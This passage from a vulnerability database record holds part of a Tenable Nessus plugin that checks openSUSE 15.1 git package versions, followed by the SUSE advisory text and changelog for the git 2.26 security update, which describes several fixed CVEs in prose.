attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1114225\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1132350\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1149792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1156651\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1158785\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1158787\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1158788\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1158789\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1158790\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1158791\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1158792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1158793\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1158795\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1167890\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1168930\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1169605\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1169786\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1169936\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-19604\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-arch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-gnome-keyring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-gnome-keyring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-libsecret\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-libsecret-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-daemon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-svn-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-arch-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-core-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-core-debuginfo-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-credential-gnome-keyring-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-credential-gnome-keyring-debuginfo-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-credential-libsecret-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-credential-libsecret-debuginfo-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-cvs-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-daemon-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-daemon-debuginfo-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-debuginfo-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-debugsource-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-email-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-gui-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-p4-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-svn-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-svn-debuginfo-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"git-web-2.26.1-lp151.4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"gitk-2.26.1-lp151.4.9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git / git-arch / git-core / git-core-debuginfo / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-15T13:46:18", "description": "This update for git fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2020-5260: With a crafted URL that contains a newline in it, the credential helper machinery can be fooled to give credential information for a wrong host (bsc#1168930).\n\nNon-security issue fixed :\n\ngit was updated to 2.26.0 for SHA256 support (bsc#1167890, jsc#SLE-11608): the xinetd snippet was removed\n\nthe System V init script for the git-daemon was replaced by a systemd service file of the same name.\n\ngit 2.26.0: 'git rebase' now uses a different backend that is based on the 'merge' machinery by default. The 'rebase.backend' configuration variable reverts to old behaviour when set to 'apply'\n\nImproved handling of sparse checkouts\n\nImprovements to many commands and internal features\n\ngit 2.25.1: 'git commit' now honors advise.statusHints\n\nvarious updates, bug fixes and documentation updates\n\ngit 2.25.0: The branch description ('git branch --edit-description') has been used to fill the body of the cover letters by the format-patch command; this has been enhanced so that the subject can also be filled.\n\nA few commands learned to take the pathspec from the standard input or a named file, instead of taking it as the command line arguments, with the '--pathspec-from-file' option.\n\nTest updates to prepare for SHA-2 transition continues.\n\nRedo 'git name-rev' to avoid recursive calls.\n\nWhen all files from some subdirectory were renamed to the root directory, the directory rename heuristics would fail to detect that as a rename/merge of the subdirectory to the root directory, which has been corrected.\n\nHTTP transport had possible allocator/deallocator mismatch, which has been corrected.\n\ngit 2.24.1: CVE-2019-1348: The --export-marks option of fast-import is exposed also via the in-stream command feature export-marks=... and it allows overwriting arbitrary paths (bsc#1158785)\n\nCVE-2019-1349: on Windows, when submodules are cloned recursively, under certain circumstances Git could be fooled into using the same Git directory twice (bsc#1158787)\n\nCVE-2019-1350: Incorrect quoting of command-line arguments allowed remote code execution during a recursive clone in conjunction with SSH URLs (bsc#1158788)\n\nCVE-2019-1351: on Windows mistakes drive letters outside of the US-English alphabet as relative paths (bsc#1158789)\n\nCVE-2019-1352: on Windows was unaware of NTFS Alternate Data Streams (bsc#1158790)\n\nCVE-2019-1353: when run in the Windows Subsystem for Linux while accessing a working directory on a regular Windows drive, none of the NTFS protections were active (bsc#1158791)\n\nCVE-2019-1354: on Windows refuses to write tracked files with filenames that contain backslashes (bsc#1158792)\n\nCVE-2019-1387: Recursive clones vulnerability that is caused by too-lax validation of submodule names, allowing very targeted attacks via remote code execution in recursive clones (bsc#1158793)\n\nCVE-2019-19604: a recursive clone followed by a submodule update could execute code contained within the repository without the user explicitly having asked for that (bsc#1158795)\n\nFix building with asciidoctor and without DocBook4 stylesheets.\n\ngit 2.24.0 The command line parser learned '--end-of-options' notation.\n\nA mechanism to affect the default setting for a (related) group of configuration variables is introduced.\n\n'git fetch' learned '--set-upstream' option to help those who first clone from their private fork they intend to push to, add the true upstream via 'git remote add' and then 'git fetch' from it.\n\nfixes and improvements to UI, workflow and features, bash completion fixes\n\npart of it merged upstream\n\nthe Makefile attempted to download some documentation, banned\n\ngit 2.23.0: The '--base' option of 'format-patch' computed the patch-ids for prerequisite patches in an unstable way, which has been updated to compute in a way that is compatible with 'git patch-id\n\n--stable'.\n\nThe 'git log' command by default behaves as if the --mailmap option was given.\n\nfixes and improvements to UI, workflow and features\n\ngit 2.22.1: A relative pathname given to 'git init\n--template=<path><repo>' ought to be relative to the directory 'git init' gets invoked in, but it instead was made relative to the repository, which has been corrected. </repo></path>\n\n'git worktree add' used to fail when another worktree connected to the same repository was corrupt, which has been corrected.\n\n'git am -i --resolved' segfaulted after trying to see a commit as if it were a tree, which has been corrected.\n\n'git merge --squash' is designed to update the working tree and the index without creating the commit, and this cannot be countermanded by adding the '--commit' option; the command now refuses to work when both options are given.\n\nUpdate to Unicode 12.1 width table.\n\n'git request-pull' learned to warn when the ref we ask them to pull from in the local repository and in the published repository are different.\n\n'git fetch' into a lazy clone forgot to fetch base objects that are necessary to complete delta in a thin packfile, which has been corrected.\n\nThe URL decoding code has been updated to avoid going past the end of the string while parsing %-<hex>-<hex> sequence. </hex></hex>\n\n'git clean' silently skipped a path when it cannot lstat() it; now it gives a warning.\n\n'git rm' to resolve a conflicted path leaked an internal message 'needs merge' before actually removing the path, which was confusing.\nThis has been corrected.\n\nMany more bugfixes and code cleanups.\n\nremoval of SuSEfirewall2 service, since SuSEfirewall2 has been replaced by firewalld, see [1]. [1]:\nhttps://lists.opensuse.org/opensuse-factory/2019-01/msg00490.html\n\ngit 2.22.0: The filter specification '--filter=sparse:path=<path>' used to create a lazy/partial clone has been removed. Using a blob that is part of the project as sparse specification is still supported with the '--filter=sparse:oid=<blob>' option </blob></path>\n\n'git checkout --no-overlay' can be used to trigger a new mode of checking out paths out of the tree-ish, that allows paths that match the pathspec that are in the current index and working tree and are not in the tree-ish.\n\nFour new configuration variables {author,committer}.{name,email} have been introduced to override user.{name,email} in more specific cases.\n\n'git branch' learned a new subcommand '--show-current'.\n\nThe command line completion (in contrib/) has been taught to complete more subcommand parameters.\n\nThe completion helper code now pays attention to repository-local configuration (when available), which allows --list-cmds to honour a repository specific setting of completion.commands, for example.\n\nThe list of conflicted paths shown in the editor while concluding a conflicted merge was shown above the scissors line when the clean-up mode is set to 'scissors', even though it was commented out just like the list of updated paths and other information to help the user explain the merge better.\n\n'git rebase' that was reimplemented in C did not set ORIG_HEAD correctly, which has been corrected.\n\n'git worktree add' used to do a 'find an available name with stat and then mkdir', which is race-prone. This has been fixed by using mkdir and reacting to EEXIST in a loop.\n\nupdate git-web AppArmor profile for bash and tar usrMerge (bsc#1132350)\n\ngit 2.21.0: Historically, the '-m' (mainline) option can only be used for 'git cherry-pick' and 'git revert' when working with a merge commit. This version of Git no longer warns or errors out when working with a single-parent commit, as long as the argument to the '-m' option is 1 (i.e. it has only one parent, and the request is to pick or revert relative to that first parent). Scripts that relied on the behaviour may get broken with this change.\n\nSmall fixes and features for fast-export and fast-import.\n\nThe 'http.version' configuration variable can be used with recent enough versions of cURL library to force the version of HTTP used to talk when fetching and pushing.\n\n'git push $there $src:$dst' rejects when $dst is not a fully qualified refname and it is not clear what the end user meant.\n\nUpdate 'git multimail' from the upstream.\n\nA new date format '--date=human' that morphs its output depending on how far the time is from the current time has been introduced.\n'--date=auto:human' can be used to use this new format (or any existing format) when the output is going to the pager or to the terminal, and otherwise the default format.\n\nFix worktree creation race (bsc#1114225).\n\ngit 2.20.1: portability fixes\n\n'git help -a' did not work well when an overly long alias was defined\n\nno longer squelched an error message when the run_command API failed to run a missing command\n\ngit 2.20.0: 'git help -a' now gives verbose output (same as 'git help\n-av'). Those who want the old output may say 'git help --no-verbose\n-a'..\n\n'git send-email' learned to grab address-looking string on any trailer whose name ends with '-by'.\n\n'git format-patch' learned new '--interdiff' and '--range-diff' options to explain the difference between this version and the previous attempt in the cover letter (or after the three-dashes as a comment).\n\nDeveloper builds now use -Wunused-function compilation option.\n\nFix a bug in which the same path could be registered under multiple worktree entries if the path was missing (for instance, was removed manually). Also, as a convenience, expand the number of cases in which\n\n--force is applicable.\n\nThe overly large Documentation/config.txt file have been split into million little pieces. This potentially allows each individual piece to be included into the manual page of the command it affects more easily.\n\nMalformed or crafted data in packstream can make our code attempt to read or write past the allocated buffer and abort, instead of reporting an error, which has been fixed.\n\nFix for a long-standing bug that leaves the index file corrupt when it shrinks during a partial commit.\n\n'git merge' and 'git pull' that merges into an unborn branch used to completely ignore '--verify-signatures', which has been corrected.\n\n...and much more features and fixes\n\nfix CVE-2018-19486 (bsc#1117257)\n\ngit 2.19.2: various bug fixes for multiple subcommands and operations\n\ngit 2.19.1: CVE-2018-17456: Specially crafted .gitmodules files may have allowed arbitrary code execution when the repository is cloned with\n\n--recurse-submodules (bsc#1110949)\n\ngit 2.19.0: 'git diff' compares the index and the working tree. For paths added with intent-to-add bit, the command shows the full contents of them as added, but the paths themselves were not marked as new files. They are now shown as new by default.\n\n'git apply' learned the '--intent-to-add' option so that an otherwise working-tree-only application of a patch will add new paths to the index marked with the 'intent-to-add' bit.\n\n'git grep' learned the '--column' option that gives not just the line number but the column number of the hit.\n\nThe '-l' option in 'git branch -l' is an unfortunate short-hand for '--create-reflog', but many users, both old and new, somehow expect it to be something else, perhaps '--list'. This step warns when '-l' is used as a short-hand for '--create-reflog' and warns about the future repurposing of the it when it is used.\n\nThe userdiff pattern for .php has been updated.\n\nThe content-transfer-encoding of the message 'git send-email' sends out by default was 8bit, which can cause trouble when there is an overlong line to bust RFC 5322/2822 limit. A new option 'auto' to automatically switch to quoted-printable when there is such a line in the payload has been introduced and is made the default.\n\n'git checkout' and 'git worktree add' learned to honor checkout.defaultRemote when auto-vivifying a local branch out of a remote tracking branch in a repository with multiple remotes that have tracking branches that share the same names. (merge 8d7b558bae ab/checkout-default-remote later to maint).\n\n'git grep' learned the '--only-matching' option.\n\n'git rebase --rebase-merges' mode now handles octopus merges as well.\n\nAdd a server-side knob to skip commits in exponential/fibbonacci stride in an attempt to cover wider swath of history with a smaller number of iterations, potentially accepting a larger packfile transfer, instead of going back one commit a time during common ancestor discovery during the 'git fetch' transaction. (merge 42cc7485a2 jt/fetch-negotiator-skipping later to maint).\n\nA new configuration variable core.usereplacerefs has been added, primarily to help server installations that want to ignore the replace mechanism altogether.\n\nTeach 'git tag -s' etc. a few configuration variables (gpg.format that can be set to 'openpgp' or 'x509', and gpg.<format>.program that is used to specify what program to use to deal with the format) to allow x.509 certs with CMS via 'gpgsm' to be used instead of openpgp via 'gnupg'. </format>\n\nMany more strings are prepared for l10n.\n\n'git p4 submit' learns to ask its own pre-submit hook if it should continue with submitting.\n\nThe test performed at the receiving end of 'git push' to prevent bad objects from entering repository can be customized via receive.fsck.* configuration variables; we now have gained a counterpart to do the same on the 'git fetch' side, with fetch.fsck.* configuration variables.\n\n'git pull --rebase=interactive' learned 'i' as a short-hand for 'interactive'.\n\n'git instaweb' has been adjusted to run better with newer Apache on RedHat based distros.\n\n'git range-diff' is a reimplementation of 'git tbdiff' that lets us compare individual patches in two iterations of a topic.\n\nThe sideband code learned to optionally paint selected keywords at the beginning of incoming lines on the receiving end.\n\n'git branch --list' learned to take the default sort order from the 'branch.sort' configuration variable, just like 'git tag --list' pays attention to 'tag.sort'.\n\n'git worktree' command learned '--quiet' option to make it less verbose.\n\ngit 2.18.0: improvements to rename detection logic\n\nWhen built with more recent cURL, GIT_SSL_VERSION can now specify 'tlsv1.3' as its value.\n\n'git mergetools' learned talking to guiffy.\n\nvarious other workflow improvements and fixes\n\nperformance improvements and other developer visible fixes\n\nUpdate to git 2.16.4: security fix release\n\ngit 2.17.1: Submodule 'names' come from the untrusted .gitmodules file, but we blindly append them to $GIT_DIR/modules to create our on-disk repo paths. This means you can do bad things by putting '../' into the name. We now enforce some rules for submodule names which will cause Git to ignore these malicious names (CVE-2018-11235, bsc#1095219)\n\nIt was possible to trick the code that sanity-checks paths on NTFS into reading random piece of memory (CVE-2018-11233, bsc#1095218)\n\nSupport on the server side to reject pushes to repositories that attempt to create such problematic .gitmodules file etc. as tracked contents, to help hosting sites protect their customers by preventing malicious contents from spreading.\n\ngit 2.17.0: 'diff' family of commands learned '--find-object=<object-id>' option to limit the findings to changes that involve the named object. </object-id>\n\n'git format-patch' learned to give 72-cols to diffstat, which is consistent with other line length limits the subcommand uses for its output meant for e-mails.\n\nThe log from 'git daemon' can be redirected with a new option; one relevant use case is to send the log to standard error (instead of syslog) when running it from inetd.\n\n'git rebase' learned to take '--allow-empty-message' option.\n\n'git am' has learned the '--quit' option, in addition to the existing '--abort' option; having the pair mirrors a few other commands like 'rebase' and 'cherry-pick'.\n\n'git worktree add' learned to run the post-checkout hook, just like 'git clone' runs it upon the initial checkout.\n\n'git tag' learned an explicit '--edit' option that allows the message given via '-m' and '-F' to be further edited.\n\n'git fetch --prune-tags' may be used as a handy short-hand for getting rid of stale tags that are locally held.\n\nThe new '--show-current-patch' option gives an end-user facing way to get the diff being applied when 'git rebase' (and 'git am') stops with a conflict.\n\n'git add -p' used to offer '/' (look for a matching hunk) as a choice, even there was only one hunk, which has been corrected. Also the single-key help is now given only for keys that are enabled (e.g. help for '/' won't be shown when there is only one hunk).\n\nSince Git 1.7.9, 'git merge' defaulted to --no-ff (i.e. even when the side branch being merged is a descendant of the current commit, create a merge commit instead of fast-forwarding) when merging a tag object.\nThis was appropriate default for integrators who pull signed tags from their downstream contributors, but caused an unnecessary merges when used by downstream contributors who habitually 'catch up' their topic branches with tagged releases from the upstream. Update 'git merge' to default to --no-ff only when merging a tag object that does *not* sit at its usual place in refs/tags/ hierarchy, and allow fast-forwarding otherwise, to mitigate the problem.\n\n'git status' can spend a lot of cycles to compute the relation between the current branch and its upstream, which can now be disabled with '--no-ahead-behind' option.\n\n'git diff' and friends learned funcname patterns for Go language source files.\n\n'git send-email' learned '--reply-to=<address>' option. </address>\n\nFuncname pattern used for C# now recognizes 'async' keyword.\n\nIn a way similar to how 'git tag' learned to honor the pager setting only in the list mode, 'git config' learned to ignore the pager setting when it is used for setting values (i.e. when the purpose of the operation is not to 'show').\n\nUse %license instead of %doc [bsc#1082318]\n\ngit 2.16.3: 'git status' after moving a path in the working tree (hence making it appear 'removed') and then adding with the -N option (hence making that appear 'added') detected it as a rename, but did not report the old and new pathnames correctly.\n\n'git commit --fixup' did not allow '-m<message>' option to be used at the same time; allow it to annotate resulting commit with more text.\n</message>\n\nWhen resetting the working tree files recursively, the working tree of submodules are now also reset to match.\n\nFix for a commented-out code to adjust it to a rather old API change around object ID.\n\nWhen there are too many changed paths, 'git diff' showed a warning message but in the middle of a line.\n\nThe http tracing code, often used to debug connection issues, learned to redact potentially sensitive information from its output so that it can be more safely sharable.\n\nCrash fix for a corner case where an error codepath tried to unlock what it did not acquire lock on.\n\nThe split-index mode had a few corner case bugs fixed.\n\nAssorted fixes to 'git daemon'.\n\nCompletion of 'git merge -s<strategy>' (in contrib/) did not work well in non-C locale. </strategy>\n\nWorkaround for segfault with more recent versions of SVN.\n\nRecently introduced leaks in fsck have been plugged.\n\nTravis CI integration now builds the executable in 'script' phase to follow the established practice, rather than during 'before_script' phase. This allows the CI categorize the failures better ('failed' is project's fault, 'errored' is build environment's).\n\nDrop superfluous xinetd snippet, no longer used (bsc#1084460)\n\nBuild with asciidoctor for the recent distros (bsc#1075764)\n\nMove %{?systemd_requires} to daemon subpackage\n\nCreate subpackage for libsecret credential helper.\n\ngit 2.16.2: An old regression in 'git describe --all $annotated_tag^0' has been fixed.\n\n'git svn dcommit' did not take into account the fact that a svn+ssh:// URL with a username@ (typically used for pushing) refers to the same SVN repository without the username@ and failed when svn.pushmergeinfo option is set.\n\n'git merge -Xours/-Xtheirs' learned to use our/their version when resolving a conflicting updates to a symbolic link.\n\n'git clone $there $here' is allowed even when here directory exists as long as it is an empty directory, but the command incorrectly removed it upon a failure of the operation.\n\n'git stash -- <pathspec>' incorrectly blew away untracked files in the directory that matched the pathspec, which has been corrected.\n</pathspec>\n\n'git add -p' was taught to ignore local changes to submodules as they do not interfere with the partial addition of regular changes anyway.\n\ngit 2.16.1: 'git clone' segfaulted when cloning a project that happens to track two paths that differ only in case on a case insensitive filesystem\n\ngit 2.16.0 (CVE-2017-15298, bsc#1063412): See https://raw.github.com/git/git/master/Documentation/RelNotes/2.16.0.tx t\n\ngit 2.15.1: fix 'auto' column output\n\nfixes to moved lines diffing\n\ndocumentation updates\n\nfix use of repositories immediately under the root directory\n\nimprove usage of libsecret\n\nfixes to various error conditions in git commands\n\nRewrite from sysv init to systemd unit file for git-daemon (bsc#1069803)\n\nReplace references to /var/adm/fillup-templates with new %_fillupdir macro (bsc#1069468)\n\nsplit off p4 to a subpackage (bsc#1067502)\n\nBuild with the external libsha1detectcoll (bsc#1042644)\n\ngit 2.15.0: Use of an empty string as a pathspec element that is used for 'everything matches' is still warned and Git asks users to use a more explicit '.' for that instead. Removal scheduled for 2.16\n\nGit now avoids blindly falling back to '.git' when the setup sequence said we are _not_ in Git repository (another corner case removed)\n\n'branch --set-upstream' was retired, deprecated since 1.8\n\nmany other improvements and updates\n\ngit 2.14.3: git send-email understands more cc: formats\n\nfixes so gitk --bisect\n\ngit commit-tree fixed to handle -F file alike\n\nPrevent segfault in 'git cat-file --textconv'\n\nFix function header parsing for HTML\n\nVarious small fixes to user commands and and internal functions\n\ngit 2.14.2: fixes to color output\n\nhttp.{sslkey,sslCert} now interpret '~[username]/' prefix\n\nfixes to walking of reflogs via 'log -g' and friends\n\nvarious fixes to output correctness\n\n'git push --recurse-submodules $there HEAD:$target' is now propagated down to the submodules\n\n'git clone --recurse-submodules --quiet' c$how propagates quiet option down to submodules.\n\n'git svn --localtime' correctness fixes\n\n'git grep -L' and 'git grep --quiet -L' now report same exit code\n\nfixes to 'git apply' when converting line endings\n\nVarious Perl scripts did not use safe_pipe_capture() instead of backticks, leaving them susceptible to end-user input. CVE-2017-14867 bsc#1061041\n\n'git cvsserver' no longer is invoked by 'git daemon' by default\n\ngit 2.14.1 (bsc#1052481): Security fix for CVE-2017-1000117: A malicious third-party can give a crafted 'ssh://...' URL to an unsuspecting victim, and an attempt to visit the URL can result in any program that exists on the victim's machine being executed. Such a URL could be placed in the .gitmodules file of a malicious project, and an unsuspecting victim could be tricked into running 'git clone\n--recurse-submodules' to trigger the vulnerability.\n\nA 'ssh://...' URL can result in a 'ssh' command line with a hostname that begins with a dash '-', which would cause the 'ssh' command to instead (mis)treat it as an option. This is now prevented by forbidding such a hostname (which should not impact any real-world usage).\n\nSimilarly, when GIT_PROXY_COMMAND is configured, the command is run with host and port that are parsed out from 'ssh://...' URL; a poorly written GIT_PROXY_COMMAND could be tricked into treating a string that begins with a dash '-' as an option. This is now prevented by forbidding such a hostname and port number (again, which should not impact any real-world usage).\n\nIn the same spirit, a repository name that begins with a dash '-' is also forbidden now.\n\ngit 2.14.0: Use of an empty string as a pathspec element that is used for 'everything matches' is deprecated, use '.'\n\nAvoid blindly falling back to '.git' when the setup sequence indicates operation not on a Git repository\n\n'indent heuristics' are now the default.\n\nBuilds with pcre2\n\nMany bug fixes, improvements and updates\n\ngit 2.13.4: Update the character width tables.\n\nFix an alias that contained an uppercase letter\n\nProgress meter fixes\n\ngit gc concurrency fixes\n\ngit 2.13.3: various internal bug fixes\n\nFix a regression to 'git rebase -i'\n\nCorrect unaligned 32-bit access in pack-bitmap code\n\nTighten error checks for invalid 'git apply' input\n\nThe split index code did not honor core.sharedrepository setting correctly\n\nFix 'git branch --list' handling of color.branch.local\n\ngit 2.13.2: 'collision detecting' SHA-1 update for platform fixes\n\n'git checkout --recurse-submodules' did not quite work with a submodule that itself has submodules.\n\nThe 'run-command' API implementation has been made more robust against dead-locking in a threaded environment.\n\n'git clean -d' now only cleans ignored files with '-x'\n\n'git status --ignored' did not list ignored and untracked files without '-uall'\n\n'git pull --rebase --autostash' didn't auto-stash when the local history fast-forwards to the upstream.\n\n'git describe --contains' gives as much weight to lightweight tags as annotated tags\n\nFix 'git stash push <pathspec>' from a subdirectory </pathspec>\n\ngit 2.13.1: Setting 'log.decorate=false' in the configuration file did not take effect in v2.13, which has been corrected.\n\ncorrections to documentation and command help output\n\ngarbage collection fixes\n\nmemory leaks fixed\n\nreceive-pack now makes sure that the push certificate records the same set of push options used for pushing\n\nshell completion corrections for git stash\n\nfix 'git clone --config var=val' with empty strings\n\ninternal efficiency improvements\n\nUpdate sha1 collision detection code for big-endian platforms and platforms not supporting unaligned fetches\n\nFix packaging of documentation\n\ngit 2.13.0: empty string as a pathspec element for 'everything matches' is still warned, for future removal.\n\ndeprecated argument order 'git merge <msg> HEAD <commit>...' was removed </commit></msg>\n\ndefault location '~/.git-credential-cache/socket' for the socket used to communicate with the credential-cache daemon moved to '~/.cache/git/credential/socket'.\n\nnow avoid blindly falling back to '.git' when the setup sequence indicated otherwise\n\nmany workflow features, improvements and bug fixes\n\nadd a hardened implementation of SHA1 in response to practical collision attacks (CVE-2005-4900, bsc#1042640)\n\nCVE-2017-8386: On a server running git-shell as login shell to restrict user to git commands, remote users may have been able to have git service programs spawn an interactive pager and thus escape the shell restrictions. (bsc#1038395)\n\nChanges in pcre2: Include the libraries, development and tools packages.\n\ngit uses only libpcre2-8 so far, but this allows further application usage of pcre2.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security 